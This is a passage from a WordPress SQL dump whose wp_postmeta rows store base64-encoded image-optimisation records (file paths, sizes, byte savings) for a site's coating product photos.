GluZy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDgxLCJ0aW1lIjoxNDgzNTg1NTY0LCJpZCI6NjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTA5NywidGltZSI6MTQ4MzU4NTU2OCwiaWQiOjYxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDg5LCJ0aW1lIjoxNDgzNTg1NTcxLCJpZCI6NjE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1ODksInRpbWUiOjE0ODM1ODU1NzUsImlkIjo2MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk2MywidGltZSI6MTQ4MzU4NTU3OSwiaWQiOjYxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTA0NSwidGltZSI6MTQ4MzU4NTU4MiwiaWQiOjYxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTM0NCwidGltZSI6MTQ4MzU4NTU4NiwiaWQiOjYxOH1d'); 
INSERT INTO `wp_postmeta` VALUES (30133, 616, 'wpfc_optimisation_reduction', '16865'); 
INSERT INTO `wp_postmeta` VALUES (30134, 616, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy5qcGciLCJ3aWR0aCI6NDc1MiwiaGVpZ2h0IjozMTY4LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTg1NTkwLCJpZCI6IjYxNiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1ODAsInRpbWUiOjE0ODM1ODU1OTQsImlkIjo2MTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNzgwLCJ0aW1lIjoxNDgzNTg1NTk3LCJpZCI6NjE2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTU1MCwidGltZSI6MTQ4MzU4NTYwMSwiaWQiOjYxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6ODIwNCwidGltZSI6MTQ4MzU4NTYwNSwiaWQiOjYxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUwNCwidGltZSI6MTQ4MzU4NTYwOSwiaWQiOjYxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyOCwidGltZSI6MTQ4MzU4NTYxMiwiaWQiOjYxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU4NTYxNSwiaWQiOjYxNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNzIsInRpbWUiOjE0ODM1ODU2MTksImlkIjo2MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjM4OSwidGltZSI6MTQ4MzU4NTYyMiwiaWQiOjYxNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDI1LCJ0aW1lIjoxNDgzNTg1NjI1LCJpZCI6NjE2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0MjIsInRpbWUiOjE0ODM1ODU2MjksImlkIjo2MTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ5NCwidGltZSI6MTQ4MzU4NTYzMiwiaWQiOjYxNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FyeWxpYy1jb2F0aW5nLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQXJ5bGljLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BcnlsaWMtY29hdGluZy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTc5LCJ0aW1lIjoxNDgzNTg1NjM2LCJpZCI6NjE2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30135, 614, 'wpfc_optimisation_reduction', '3004702'); 
INSERT INTO `wp_postmeta` VALUES (30136, 614, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLmpwZyIsIndpZHRoIjozNjQ4LCJoZWlnaHQiOjI3MzYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUuanBnIiwicmVkdWN0aW9uIjozMDA0Njg5LCJ0aW1lIjoxNDgzNTg1NjQ3LCJpZCI6IjYxNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NjUwLCJpZCI6NjE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS04MDB4NjAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS04MDB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS04MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTY1MywiaWQiOjYxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtNzY4eDU3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU2NTYsImlkIjo2MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTE2MDB4MTIwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS0xNjAweDEyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTE2MDB4MTIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU2NjAsImlkIjo2MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NjYzLCJpZCI6NjE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAx